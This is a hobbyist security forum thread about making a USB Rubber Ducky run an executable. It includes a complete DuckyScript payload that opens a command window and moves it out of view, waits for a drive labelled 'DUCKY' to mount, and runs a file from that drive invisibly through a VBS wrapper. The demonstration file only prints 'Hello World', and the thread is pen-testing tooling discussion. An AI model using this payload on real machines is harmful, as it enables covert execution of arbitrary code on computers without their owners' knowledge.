Jump to content

[Question] Is it Possible to run .exes?


blacblu
 Share

Recommended Posts

Yes - Look at Twin Duck Firmware (c_duck_v2.hex), it can be executed straight from the HID payload.

There should be info in the forums, Overwraith has some demo code somewhere?

Edited by midnitesnake
Link to comment
Share on other sites

Information on the PoC (before Xmas) is here: http://forums.hak5.org/index.php?/topic/28162-introducing-twin-duck-firmware/?p=214115

Now you can use DuckyScript to deliver a HID payload rather than the previous hard-coded executable.

You can use the following code to search for the drive via label

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

then execute a binary on the ducky by

%myd%/my_executable.exe

or

%myd%/my_batfile.bat

Other Info is on the website, in my signature.

Link to comment
Share on other sites

The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. I have been having some problems with delays so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".

REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt
 

P.S. when is the online payload generator getting back online!!! I need the REPEAT command!!!! You will need to replace REPEAT in the beginning of the code with 100 repeats, so copy paisty.

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...